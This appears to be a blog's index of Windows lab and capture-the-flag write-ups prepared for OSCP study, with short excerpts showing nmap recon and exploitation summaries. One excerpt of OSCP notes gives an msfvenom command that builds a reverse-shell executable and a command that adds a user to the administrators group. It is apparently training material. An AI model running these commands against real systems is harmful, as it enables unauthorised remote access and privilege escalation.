Windows

Jerry

Dec 31, 2020 TJNull's List Windows Tomcat

Introduction: Jerry is a very easy machine where you can enumerate the tomcat webserver and upload a webshell to exploit the box. Recon 1 nmap -sS -sC -sV -T4 -O -oN nmap.jerry.txt 10.10.10.95 2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 15:22 EST 3Nmap scan report for 10.10.10.95 4Host is up (0.013s …

Grandpa

Dec 31, 2020 TJNull's List Windows Metasploit

Introduction: The “grandpa” is an easy windows machine with a CVE exploit using metasploit. Since the machine is very old, its also vulnerable to many other exploits that you can chose from for the privilege escalation at the end. The key takeaways for me were Based on the CVE you are exploiting, determine …

Devel

Dec 23, 2020 TJNull's List Windows IIS Metasploit

Introduction: This is a windows machine running IIS server, FTP service and presents few exploitable vulnerabilities. Its a very easy machine and I avoided using metasploit to work on this machine as I want to avoid/limit the usage as much as possible keeping the OSCP in mind. Recon Nmap output 1Nmap scan report for …

Blue

Dec 21, 2020 TJNull's List Metasploit Windows

Introduction: Recon 1# nmap -sS -sV -sC -T4 -oN nmap.blue.txt 10.10.10.40 2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:24 EST 3Nmap scan report for 10.10.10.40 4Host is up (0.015s latency). 5Not shown: 991 closed ports 6PORT STATE SERVICE VERSION 7135/tcp open msrpc Microsoft Windows RPC 8139/tcp open …

Granny

Dec 10, 2020 TJNull's List Metasploit Windows

Introduction: The “granny” is a windows box and very similar to the “grandpa” box in terms of the exploits and privesc. You will be exploiting an IIS CVE to gain initial access to the machine, then migrate your process and use one of the many possible exploits to do a privilege escalation. Recon …

Privilege Escalation on Linux

Dec 6, 2020 tips windows PrivEsc

OSCP Notes msfvenom to spawn rev shell on windows - #msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your host> LPORT=<your port> -f exe -o revshell.exe Adding user to Admin group - net localgroup administrators <username> /add PsExec tool - to escalate from admin user to full SYSTEM privs - …

Gatekeeper - Buffer Overflow

Nov 29, 2020 buffer overflow windows mona immunity debugger

TryHackMe link: https://tryhackme.com/room/gatekeeper Recon Let’s get started with the nmap scan. I also kicked off the threader3000 port scanner script (https://github.com/dievus/threader3000.git) which I have started to like a lot since it often reveals ports that were missed by nmap scans. 1# nmap -Pn -A -T4 …

Brainstorm - Buffer Overflow

Nov 28, 2020 buffer overflow windows mona immunity debugger

Reconnaissance Run a port scanner to check for open ports on the target system. 1------------------------------------------------------------ 2 Threader 3000 - Multi-threaded Port Scanner 3 Version 1.0.6 4 A project by The Mayor 5------------------------------------------------------------ 6Enter your target IP address …

Relevant

Oct 3, 2020 Windows PrivEsc IIS

Scope of work The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you …